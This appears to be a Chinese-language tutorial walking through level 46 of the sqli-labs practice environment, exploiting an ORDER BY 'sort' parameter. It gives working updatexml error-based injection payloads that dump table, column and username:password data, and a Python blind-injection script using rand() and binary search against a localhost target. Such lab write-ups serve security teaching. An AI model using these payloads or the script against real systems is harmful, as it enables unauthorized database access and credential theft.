网络安全——sqli-labs第46关详解

目录

实验环境：​编辑

实验过程：

初步渗透：

解法一：报错注入

解法二：盲注和python脚本

总结：

---

实验环境：

        sqli-labs第46关

实验过程：

初步渗透：

        页面提示我们输入一个sort，那我们就输入 sort=1看一看是个怎么个事再试一试2和3，发现它好像是一个order by排序，为了验证猜想我们看一下源码果然是这样咱们输入的sort传到order by的参数了，我们还发现源码里面会输出sql查询语句的报错，那我们想到的一定是报错注入了。

解法一：报错注入

既然是报错注入了我们就先使用updatexml试一下吧：

?sort=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

我们发现报错注入成功了，并且updatexml没有被过滤，那么我们就接着报错注入的步骤往下走看看：

#查表名
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+
#查列名（字段）
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--
+
#查数据
?sort=1 and updatexml(1,concat(0x7e,(select substring(group_concat(username,':',password),1,32) from users ),0x7e),1)--+
#substring一次只能显示32个字节，所以我们只需要多次调整后面两个参数即可得到完整的数据

解法二：盲注和python脚本

这里介绍一下order by 注入——基于rand()的盲注（数字型）：

rand() 函数可以产生随机数介于0和1之间的一个数，当给rand() 一个参数的时候，会将该参数作为一个随机种子，生成一个介于0-1之间的一个数,种子固定,则生成的数固定，order by rand:这个不是分组，只是排序，rand()只是生成一个随机数,每次检索的结果排序会不同。当表达式true和false时，排序结果是不同的，所以就可以使用rand()函数进行盲注了。 例：

order by rand(ascii(substr((select database()),1,1))>96)

那么在这一关中就是：sort=rand(ascii(substr((select database()),1,1))>96)--+我们已经知道数据库了，第一个字母为s，ascii编码为115，所以这个时候结果为true，我们再试试结果为false看看页面有什么变化，输入：sort=rand(ascii(substr((select database()),1,1))>115)--+​​​​​​​​​​​​​​        结果明显不一样，所以这里可以用盲注来实现，我们发现当结果为真时order by根据password字段进行排序，结果为false时order by根据它并没有根据任意一个字段进行排序，所以order by不能作为判断真假的条件，我发现为真时username第一个数据为admin3，为假是第一个数据是Dumb。那我们就根据这个条件来写我们的python脚本吧。

        但是我们怎么拿到这个数据呢，这就要利用爬虫的BeautifulSoup框架了，拿到这个数据就可以写脚本了。具体代码如下：

import requests
from bs4 import BeautifulSoup

url1 = "http://localhost/sqli-labs-master/Less-46/index.php"
def inject_database(url):
    name = ''
    for i in range(1, 100):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "rand(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'), %d, 1)) > %d)" % (i, mid)
            res = {"sort": payload}
            r = requests.get(url1, params=res)
            html = r.text
            soup = BeautifulSoup(html, 'html.parser')
            getusername = soup.find_all('td')[1].text
            if getusername == 'admin3':
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name += chr(mid)
        print(name)
inject_database(url1)

总结：

        这一关里，源码中没有注释掉MySQL的报错信息，所以我们可以进行报错注入，如果MySQL报错信息一旦被注释掉，我们就只能使用order by注入了，其实order by还有很多的注入方式，rand只是其中一个。大家有兴趣可以去学一下。